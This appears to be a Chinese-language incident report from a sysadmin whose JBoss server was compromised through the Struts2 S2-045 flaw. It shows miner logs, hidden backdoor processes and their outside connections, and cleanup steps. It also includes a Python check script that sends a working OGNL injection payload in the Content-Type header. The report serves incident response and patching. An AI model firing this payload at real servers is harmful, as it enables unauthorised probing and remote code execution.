[root@app130-33 ~]# cat myout.file 
YAM - Yet Another Miner by yvg1900
yam M7v-linux64-core2/yvg1900
**********************************************************************************************************
* Supported coins: PTS MMC MAX GRS DMD DVK MYR BCN QCN FCN XMR                                           *
* Author: yvg1900 (Twitter @yvg1900)                                                                     *
* XPT protocol: jh (http://ypool.net)                                                                    *
*                                                                                                        *
* Addresses for Thanks and Donations:                                                                    *
*   PTS: PZxsEQoiMeB6tHcW2ZySBEiCPio1WkxbEL                                                              *
*   XPM: AW2388DEWNEfMH4rP9kcj9yKcMq1QywYT4                                                              *
*   DTC: D6PmUogMigWvXurgFTqm5VLxQeVpXdYQj3                                                              *
*   MMC: MVk7PuJCa9o6qTYeiQRJDd3uHxKXMrQuU6                                                              *
*   LTC: Lby4YjhcAxhmbsdHFb4nYydrwGoiJezZt1                                                              *
*   BTC: 1FxekeK5La7AuF3oxiLzPKnjXyLMrux6VT                                                              *
*   NMC: N9KXqmzEqP7gB2dGHpEZiRMgFjUHNM38FR                                                              *
*   MAX: mTEsqg9dp3U9YXwduKxhhhDx1TRPBcNRvA                                                              *
*   NRS: 9qwyC34MCZ9XGopaNDNTnaMBtjAZhHvBd3                                                              *
*   GRS: FpHaQNJ2nMUc2kgBbzYue13E9VUfL8YbQp                                                              *
*   DMD: dEQZa7W7AczvUsjJkvWWrim1j8ZtgbAwXv                                                              *
*   DVK: D9o66V4h75JzWNpsaPidmKFVgwEf2DcDAX                                                              *
*   MYR: MFDpLPThL6D6vtWW42XobFNBpPdrJFPQb6                                                              *
*   XMR: 45w9aqVA6iVeMJ6jVHZPEyPqgVnBEAGhBBqGAW9ncXp44qbZy9vXkd2KpqYwcyVTQHF1kaSJm97GyceP3Y2dRMd7E9gyuZf *
*   BCN: 2AcGMZmmNWTiLvAg5n7ywMCAxXTxysYGsi1xzba2ok4UPccWTLqRyKN7EnQYUpEWpqBw1c9EVZrqo2CUG8f8mbjG5NA9njF *
*   QCN: 1V6wZP6aycYPbeafHxPcvaQfGs4M5kabHDQoTEsyCTT3HjccMyQbvEVNPoJuRc79XrPRYWESiAezyipWojpZ8bii3kczNgW *
*   FCN: 6rNjXkY5YQzWiTMmDUbL5gYTWx9UTdUMSA98S1G3cTmhZN9Xp6kq4woGeoK5Q8B3fPZV6TFKs36zdHpZnYxA4BFK3fLpJzW *
**********************************************************************************************************
Can not load config file [x]
Miner version: yam M7v-linux64-core2/yvg1900
Checking target [stratum+tcp://47CunEQ4v8FPVNnw9mDgNZeaiSo6SVDydB3AZM341ZtdYpBYNmYeqhh4mpU1X6RSmgBTfC8xqaAtUGC2DArotyaKSz1LJyj.f2bec1df3c6bf9a03c8ce785d333ff96bc65f9a2df0189a8635878d6d26ae814:[email protected]:8005:8050:8080:8100/xmr]...
Target OK
Checking XMR optimizations compatibility...
OK: XMR optimizations are compatible
Monero: Determine Algorithm Variation by finetuning
Using 16 CPU mining threads
  Will mine 96 rounds for miner developers to support development of the next version
  Follow @yvg1900 on Twitter to get information on new version availability on time
Monero Aggregated Hash/sec: ?; Rounds Complete/Incomplete: 0/0, Donated Complete/Incomplete: 0/0; Config/Worker Hash/sec: ?/? on 0 rounds with AV=1, ART=? ms; Fine-tuning: IN PROGRESS, AV/RT: 1/0, Best AV/RT: 1/0
  moria.dwarfpool.com: Connecting, Shares Submitted 0, Accepted 0
STRATUM-RPC2: Logged in with 47CunEQ4v8FPVNnw9mDgNZeaiSo6SVDydB3AZM341ZtdYpBYNmYeqhh4mpU1X6RSmgBTfC8xqaAtUGC2DArotyaKSz1LJyj.f2bec1df3c6bf9a03c8ce785d333ff96bc65f9a2df0189a8635878d6d26ae814
New Monero Block nTime 1489470304
New Monero Block nTime 1489470309
Monero Aggregated Hash/sec: ?; Rounds Complete/Incomplete: 0/0, Donated Complete/Incomplete: 0/0; Config/Worker Hash/sec: ?/? on 0 rounds with AV=1, ART=? ms; Fine-tuning: IN PROGRESS, AV/RT: 1/0, Best AV/RT: 1/0
  moria.dwarfpool.com: On-line, Shares Submitted 0, Accepted 0


处理过程:

服务:
[root@app130-33 bin]# date -u
2017年 03月 14日 星期二 06:15:29 UTC
[root@app130-33 bin]# date -R
Tue, 14 Mar 2017 14:18:03 +0800
[root@app130-33 bin]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:B6:38:21
inet addr:192.168.130.33 Bcast:192.168.130.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feb6:3821/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1064663029 errors:0 dropped:0 overruns:0 frame:0
TX packets:902352525 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:507233208569 (472.3 GiB) TX bytes:634865464079 (591.2 GiB)
查看服务硬件
[root@app130-33 bin]# lspci
00:18.4 PCI bridge: VMware PCI Express Root Port (rev 01)
00:18.5 PCI bridge: VMware PCI Express Root Port (rev 01)
00:18.6 PCI bridge: VMware PCI Express Root Port (rev 01)
00:18.7 PCI bridge: VMware PCI Express Root Port (rev 01)
显示为VMware的虚拟机
看进程
[root@app130-33 bin]# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 19364 1628 ? Ss 2016 0:52 /sbin/init
root 2 0.0 0.0 0 0 ? S 2016 0:00 [kthreadd]
#中间省略多数系统进程
root 236 0.0 0.0 0 0 ? S 2016 0:00 [kthrotld/15]
root 237 0.0 0.0 0 0 ? S 2016 0:00 [pciehpd]
root 239 0.0 0.0 0 0 ? S 2016 0:00 [kpsmoused]
root 240 0.0 0.0 0 0 ? S 2016 0:00 [usbhid_resumer]
root 270 0.0 0.0 0 0 ? S 2016 0:00 [kstriped]
root 336 0.0 0.0 94660 4988 ? Ssl 13:31 0:01 ./zou
root 375 0.0 0.0 0 0 ? S 2016 0:00 [scsi_eh_0]
root 376 0.0 0.0 0 0 ? S 2016 0:00 [scsi_eh_1]
root 415 0.0 0.0 11716 604 ? Ssl 13:31 0:00 /usr/bin/.sshd
root 463 0.0 0.0 0 0 ? S 2016 0:00 [scsi_eh_2]
root 464 0.0 0.0 0 0 ? S 2016 0:00 [vmw_pvscsi_wq_2]
root 506 0.0 0.0 0 0 ? S 2016 53:20 [jbd2/sda1-8]
root 507 0.0 0.0 0 0 ? S 2016 0:00 [ext4-dio-unwrit]
root 539 0.0 0.0 888 276 ? Ss 13:31 0:02 /etc/.zl
root 592 0.0 0.0 11296 1384 ? S122.192.218.121:7759 (ESTABLISHED)
[root@app130-33 bin]# lsof -p 975
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
.System 975 root cwd DIR 8,1 3514368 1703937 /tmp
.System 975 root rtd DIR 8,1 4096 2 /
.System 975 root txt REG 8,1 1820918 1450903 /etc/.System
.System 975 root mem REG 8,1 156928 796038 /lib64/ld-2.12.so
.System 975 root mem REG 8,1 1926800 796039 /lib64/libc-2.12.so
.System 975 root mem REG 8,1 113952 796046 /lib64/libresolv-2.12.so
.System 975 root mem REG 8,1 27424 786460 /lib64/libnss_dns-2.12.so
.System 975 root mem REG 8,1 65928 786462 /lib64/libnss_files-2.12.so
.System 975 root 0u IPv4 91810515 0t0 TCP app130-33:52331->123.135.128.178:29135 (ESTABLISHED)
[root@app130-33 bin]# lsof -p 7601
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
.yam 7601 root cwd DIR 8,1 4096 1179649 /root
.yam 7601 root rtd DIR 8,1 4096 2 /
.yam 7601 root txt REG 8,1 3867096 1450905 /etc/.yam
.yam 7601 root mem REG 8,1 156928 796038 /lib64/ld-2.12.so
[root@app130-33 bin]# lsof -p 18894
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
.sshd 18894 root cwd DIR 8,1 4096 1835318 /jboss-4.2.3/bin
.sshd 18894 root rtd DIR 8,1 4096 2 /
.sshd 18894 root txt REG 8,1 1223123 298354 /usr/bin/.sshd
.sshd 18894 root 0u CHR 1,3 0t0 3968 /dev/null
.sshd 18894 root 1u CHR 1,3 0t0 3968 /dev/null
.sshd 18894 root 2u CHR 1,3 0t0 3968 /dev/null
.sshd 18894 root 3uW REG 8,1 5 1703947 /tmp/moni.lod
服务登陆记录
[root@app130-33 bin]# last
root pts/2 192.168.10.47 Tue Mar 14 14:36 still logged in
root pts/8 192.168.10.86 Tue Mar 14 14:10 still logged in
root pts/7 192.168.10.47 Tue Mar 14 14:07 - 14:13 (00:05)
root pts/6 10.8.0.118 Tue Mar 14 14:05 still logged in
root pts/6 10.8.0.118 Tue Mar 14 14:00 - 14:04 (00:04)
wclog pts/4 10.8.1.158 Tue Mar 14 14:00 - 14:30 (00:30)
root pts/3 10.8.0.6 Tue Mar 14 13:58 still logged in
root pts/1 10.8.0.14 Tue Mar 14 13:46 still logged in
root pts/0 10.8.0.242 Tue Mar 14 13:42 still logged in
wclog pts/0 10.8.1.158 Tue Mar 14 12:19 - 12:49 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 11:49 - 12:19 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 11:19 - 11:49 (00:30)
.yam 7601 root mem REG 8,1 1926800 796039 /lib64/libc-2.12.so
.yam 7601 root mem REG 8,1 113952 796046 /lib64/libresolv-2.12.so
.yam 7601 root mem REG 8,1 27424 786460 /lib64/libnss_dns-2.12.so
.yam 7601 root mem REG 8,1 65928 786462 /lib64/libnss_files-2.12.so
.yam 7601 root 0r CHR 1,3 0t0 3968 /dev/null
.yam 7601 root 1w REG 8,1 76373 1190862 /root/myout.file
.yam 7601 root 2w REG 8,1 76373 1190862 /root/myout.file
.yam 7601 root 3u REG 0,9 0 3966 [eventfd]
.yam 7601 root 4u REG 0,9 0 3966 [eventpoll]
.yam 7601 root 5u REG 0,9 0 3966 [timerfd]
.yam 7601 root 6u IPv4 92265271 0t0 TCP app130-33:22516->ns377151.ip-94-23-55.eu:mxi .yam 7601 root 7r FIFO 0,8 0t0 91921852 pipe
.yam 7601 root 8w FIFO 0,8 0t0 91921852 pipe
[root@app130-33 bin]# lsof -p 18785
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
zou 18785 root cwd DIR 8,1 4096 1835318 /jboss-4.2.3/bin
zou 18785 root rtd DIR 8,1 4096 2 /
zou 18785 root txt REG 8,1 1223123 1839010 /jboss-4.2.3/bin/zou
zou 18785 root 0u CHR 1,3 0t0 3968 /dev/null
zou 18785 root 1u CHR 1,3 0t0 3968 /dev/null
zou 18785 root 2u CHR 1,3 0t0 3968 /dev/null
zou 18785 root 3uW REG 8,1 5 1703940 /tmp/gates.lod
zou 18785 root 4u IPv4 92281673 0t0 TCP app130-33:6097->122.192.218.121:7759 (SYN_SENT)
[root@app130-33 bin]# lsof -p 23720
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
.lz148947 23720 root cwd DIR 8,1 4096 1835318 /jboss-4.2.3/bin
.lz148947 23720 root rtd DIR 8,1 4096 2 /
.lz148947 23720 root txt REG 8,1 727556 1703943 /tmp/.lz1489471809
.lz148947 23720 root 0r CHR 1,3 0t0 3968 /dev/null
.lz148947 23720 root 1w FIFO 0,8 0t0 91799092 pipe
.lz148947 23720 root 2w FIFO 0,8 0t0 91799092 pipe
.lz148947 23720 root 3r IPv4 92165385 0t0 TCP app130-33:ewctsp->222.186.59.156:exp1
服务登陆记录
[root@app130-33 bin]# last
root pts/2 192.168.10.47 Tue Mar 14 14:36 still logged in
root pts/8 192.168.10.86 Tue Mar 14 14:10 still logged in
root pts/7 192.168.10.47 Tue Mar 14 14:07 - 14:13 (00:05)
root pts/6 10.8.0.118 Tue Mar 14 14:05 still logged in
root pts/6 10.8.0.118 Tue Mar 14 14:00 - 14:04 (00:04)
wclog pts/4 10.8.1.158 Tue Mar 14 14:00 - 14:30 (00:30)
root pts/3 10.8.0.6 Tue Mar 14 13:58 still logged in
root pts/1 10.8.0.14 Tue Mar 14 13:46 still logged in
root pts/0 10.8.0.242 Tue Mar 14 13:42 still logged in
wclog pts/0 10.8.1.158 Tue Mar 14 12:19 - 12:49 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 11:49 - 12:19 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 11:19 - 11:49 (00:30)
root pts/1 10.8.0.6 Tue Mar 14 11:08 - 11:38 (00:30)
wclog pts/2 10.8.0.90 Tue Mar 14 10:51 - 14:13 (03:21)
wclog pts/2 10.8.0.90 Tue Mar 14 10:50 - 10:51 (00:00)
wclog pts/0 10.8.1.158 Tue Mar 14 10:49 - 11:19 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 10:19 - 10:49 (00:30)
root pts/1 10.8.0.118 Tue Mar 14 10:12 - 10:56 (00:43)
wclog pts/6 10.8.0.90 Tue Mar 14 10:04 - 10:52 (00:48)
wclog pts/5 10.8.0.26 Tue Mar 14 10:03 - 14:31 (04:27)
root pts/4 10.8.0.242 Tue Mar 14 10:00 - 10:21 (00:21)
root pts/3 10.8.0.6 Tue Mar 14 09:55 - 10:25 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 09:48 - 10:18 (00:30)
root tty1 Tue Mar 14 09:48 - 10:18 (00:30)
wclog pts/2 10.8.0.38 Tue Mar 14 09:43 - 10:13 (00:30)
root pts/1 10.8.0.14 Tue Mar 14 09:40 - 10:10 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 09:18 - 09:48 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 08:48 - 09:18 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 08:18 - 08:48 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 07:48 - 08:18 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 07:18 - 07:48 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 06:48 - 07:18 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 06:18 - 06:48 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 05:48 - 06:18 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 05:17 - 05:48 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 04:47 - 05:17 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 04:17 - 04:47 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 03:47 - 04:17 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 03:17 - 03:47 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 02:47 - 03:17 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 02:17 - 02:47 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 01:47 - 02:17 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 01:17 - 01:47 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 00:47 - 01:17 (00:30)
wclog pts/0 10.8.1.158 Tue Mar 14 00:17 - 00:47 (00:30)
sshd在线情况
[root@app130-33 bin]# w
14:38:45 up 105 days, 2:57, 6 users, load average: 11.31, 12.82, 13.96
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 10.8.0.242 13:42 26.00s 6:01 0.39s -bash
root pts/1 10.8.0.14 13:46 3:15 0.11s 0.11s -bash
root pts/2 192.168.10.47 14:36 2.00s 0.03s 0.03s -bash
root pts/3 10.8.0.6 13:58 41.00s 0.06s 0.06s -bash
root pts/6 10.8.0.118 14:05 2:46 0.30s 0.30s -bash
root pts/8 192.168.10.86 14:10 0.00s 0.30s 0.00s w
杀掉可以进程,中断***活动
[root@app130-33 bin]# kill -9 336 415 539 975 976 980 7601 18785 18894 23720
查***文件的时间
[root@app130-33 tmp]# stat .lz1489471809
File: ".lz1489471809"
Size: 727556 Blocks: 1424 IO Block: 4096 普通文件
Device: 801h/2049d Inode: 1703943 Links: 1
Access: (0777/-rwxrwxrwx) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2017-03-14 14:10:11.719101612 +0800
Modify: 2017-03-11 20:27:26.000000000 +0800
Change: 2017-03-14 14:10:11.701101612 +0800
[root@app130-33 tmp]# stat /jboss-4.2.3/bin/zou
File: "/jboss-4.2.3/bin/zou"
Size: 1223123 Blocks: 2392 IO Block: 4096 普通文件
Device: 801h/2049d Inode: 1839010 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2017-03-14 14:03:13.938101936 +0800
Modify: 2017-03-14 14:03:12.907101936 +0800
Change: 2017-03-14 14:44:23.231100024 +0800
[root@app130-33 tmp]# stat /usr/bin/.sshd
File: "/usr/bin/.sshd"
Size: 1223123 Blocks: 2392 IO Block: 4096 普通文件
Device: 801h/2049d Inode: 298354 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2017-03-14 14:03:22.632101929 +0800
Modify: 2017-03-14 14:03:21.593101930 +0800
Change: 2017-03-14 14:03:21.593101930 +0800
[root@app130-33 tmp]# stat /tmp/moni.lod
File: "/tmp/moni.lod"
Size: 5 Blocks: 8 IO Block: 4096 普通文件
Device: 801h/2049d Inode: 1703947 Links: 1
Access: (0777/-rwxrwxrwx) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2017-03-14 14:26:49.952100839 +0800
Modify: 2017-03-14 14:03:23.011101928 +0800
Change: 2017-03-14 14:10:09.624101613 +0800
[root@app130-33 tmp]# stat /etc/.zl
File: "/etc/.zl"
Size: 727556 Blocks: 1424 IO Block: 4096 普通文件
Device: 801h/2049d Inode: 1450898 Links: 1
Access: (0777/-rwxrwxrwx) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2017-03-14 13:31:28.539103410 +0800
Modify: 2017-03-11 20:27:26.000000000 +0800
Change: 2017-03-14 13:31:28.489103410 +0800
[root@app130-33 tmp]# stat /etc/.System
File: "/etc/.System"
Size: 1820918 Blocks: 3560 IO Block: 4096 普通文件
Device: 801h/2049d Inode: 1450903 Links: 1
Access: (0777/-rwxrwxrwx) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2017-03-14 13:32:05.150103382 +0800
Modify: 2017-03-14 01:30:04.000000000 +0800
Change: 2017-03-14 13:32:05.149103382 +0800
[root@app130-33 tmp]# stat /tmp/dbuspm-session
stat: 无法获取"/tmp/dbuspm-session" 的文件状态(stat): 没有那个文件或目录
[root@app130-33 tmp]# stat /etc/.yam
File: "/etc/.yam"
Size: 3867096 Blocks: 7560 IO Block: 4096 普通文件
Device: 801h/2049d Inode: 1450905 Links: 1
Access: (0777/-rwxrwxrwx) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2017-03-14 13:45:01.844102781 +0800
Modify: 2017-02-23 03:24:45.000000000 +0800
Change: 2017-03-14 13:44:44.652102794 +0800
[root@app130-33 tmp]# stat /root/myout.file
File: "/root/myout.file"
Size: 21706 Blocks: 56 IO Block: 4096 普通文件
Device: 801h/2049d Inode: 1190862 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2017-03-14 14:38:03.267100318 +0800
Modify: 2017-03-14 14:47:42.544099870 +0800
Change: 2017-03-14 14:47:42.544099870 +0800
[root@app130-33 tmp]# stat /tmp/gates.lod
File: "/tmp/gates.lod"
Size: 5 Blocks: 8 IO Block: 4096 普通文件
Device: 801h/2049d Inode: 1703940 Links: 1
Access: (0777/-rwxrwxrwx) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2017-03-14 14:03:16.205101934 +0800
Modify: 2017-03-14 14:03:16.205101934 +0800
Change: 2017-03-14 14:10:09.624101613 +0800

wKiom1jKOvLyRBXtAAAyOUxnbx4001.png-wh_50


再续服务器被肉鸡的经历-- struts2漏洞_第1张图片


问题分析:已经确认漏洞点是在struts2,在几个确定的版本中,struts2会执行http请求header的content-type中的代码,

***者可以直接利用这个漏洞在应用所在的服务器上篡改各种命令,生成各种***,从而导致应用所在的服务器轮为DDOS的肉鸡或挖矿工具,更为甚者导致数据泄露。


解决方案:


1. 根据***的特征,编写相应的脚本每分钟做扫描,定时终止***进程,保证***没有可执行环境。

2. 根据***目前***的位置,定时删除相应目录下的可执行文件,保证***没有可执行的内容。

3. 降低jboss进程在操作系统的权限,改为非root用户启动,预防被攻入后***可以随意在系统篡改内容。

4. 根据apache官方和安全网站的建议,修改struts2对于content-type执行的判断,拒绝非法内容的执行。

5. 升级struts2的版本到制定版本


附件:struts2检测脚本

import requests
import sys
 
def poc(url):

    payload = "%{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"

    headers = {}

    headers["Content-Type"] = payload

    r = requests.get(url, headers=headers)

    if "105059592" in r.content:

        return True
 

    return False



if __name__ == '__main__':

##    if len(sys.argv) == 1:
##
##        print "python s2-045.py target"
##
##        sys.exit()

    if poc("http://www.XXXXX.com/XXX/"):

        print "vulnerable"

    else:

        print "not vulnerable"


参考资料:

http://8btc.com/article-1880-1.html

https://www.secpulse.com/archives/56570.html